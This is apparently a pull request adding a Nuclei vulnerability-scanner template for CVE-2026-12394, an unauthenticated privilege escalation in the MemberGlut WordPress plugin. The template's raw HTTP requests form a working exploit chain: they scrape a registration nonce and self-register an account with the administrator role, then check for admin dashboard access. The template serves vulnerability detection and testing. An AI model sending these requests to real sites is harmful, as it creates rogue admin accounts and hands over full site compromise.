### PR TITLE
Add CVE-2026-12394 Nuclei template

### DIFF
--- a/http/cves/2026/CVE-2026-12394.yaml
+++ b/http/cves/2026/CVE-2026-12394.yaml
@@ -1,0 +1,81 @@
+id: CVE-2026-12394
+
+info:
+  name: MemberGlut < 1.1.5 - Unauthenticated Privilege Escalation via Registration Role
+  author: str4k3r
+  severity: critical
+  description: |
+    The MemberGlut - Role & User Management WordPress plugin registers a
+    front-end registration handler on `template_redirect` that is reachable
+    by unauthenticated visitors. `process_registration()` reads the
+    attacker-supplied `default_role` POST field and, prior to 1.1.5, passes
+    it straight to `WP_User::set_role()` after only `sanitize_text_field()`
+    with no allowlist check, so any unauthenticated visitor who can obtain a
+    valid `register_nonce` (rendered by the public `[memberglut_register_form]`
+    shortcode) can self-register an account with the `administrator` role,
+    resulting in full site compromise. The plugin also auto-logs the new
+    user in and returns WordPress auth cookies in the registration
+    response, so this template confirms admin-only dashboard access
+    (`/wp-admin/users.php`) immediately afterwards without any further
+    credentials. Fixed in 1.1.5 by validating `default_role` against a
+    fixed allowlist (`subscriber`, `memberglut_basic`, `memberglut_premium`,
+    `memberglut_vip`) before calling `set_role()`.
+  reference:
+    - https://wpscan.com/vulnerability/6b126a3e-30d5-4bed-ba47-33e589ec2852/
+    - https://plugins.trac.wordpress.org/browser/memberglut/tags/1.1.0/includes/class-memberglut-forms.php
+    - https://plugins.trac.wordpress.org/browser/memberglut/tags/1.1.5/includes/class-memberglut-forms.php
+  classification:
+    cve-id: CVE-2026-12394
+    cwe-id: CWE-269
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+  metadata:
+    verified: true
+    max-request: 3
+    vendor: memberglut
+    product: memberglut
+  tags: cve,cve2026,wordpress,wp-plugin,memberglut,privesc,unauth,account-takeover
+
+variables:
+  page_id: ""
+  reg_user: "cve12394-{{randstr}}"
+  reg_pass: "Cve12394!{{randstr}}Aa1"
+
+http:
+  - cookie-reuse: true
+    raw:
+      - |
+        GET /?page_id={{page_id}} HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        POST /?page_id={{page_id}} HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        action=memberglut_register&register_nonce={{register_nonce}}&username={{reg_user}}&email={{reg_user}}@example.test&password={{reg_pass}}&first_name=a&last_name=a&default_role=administrator
+
+      - |
+        GET /wp-admin/users.php HTTP/1.1
+        Host: {{Hostname}}
+
+    extractors:
+      - type: regex
+        name: register_nonce
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - 'name="register_nonce" value="([a-f0-9]+)"'
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        part: body
+        words:
+          - "Add New User"
+          - "<title>Users"
+        condition: or


### PR DESCRIPTION
Adds a parameterized Nuclei template for CVE-2026-12394. Any required setup, seed, authentication, or callback values are exposed as scan-time variables; no forge-local target address is embedded. Native Nuclei validation passed, and the local ledger records the vulnerable/fixed differential as 3/3 detected versus 3/3 not detected.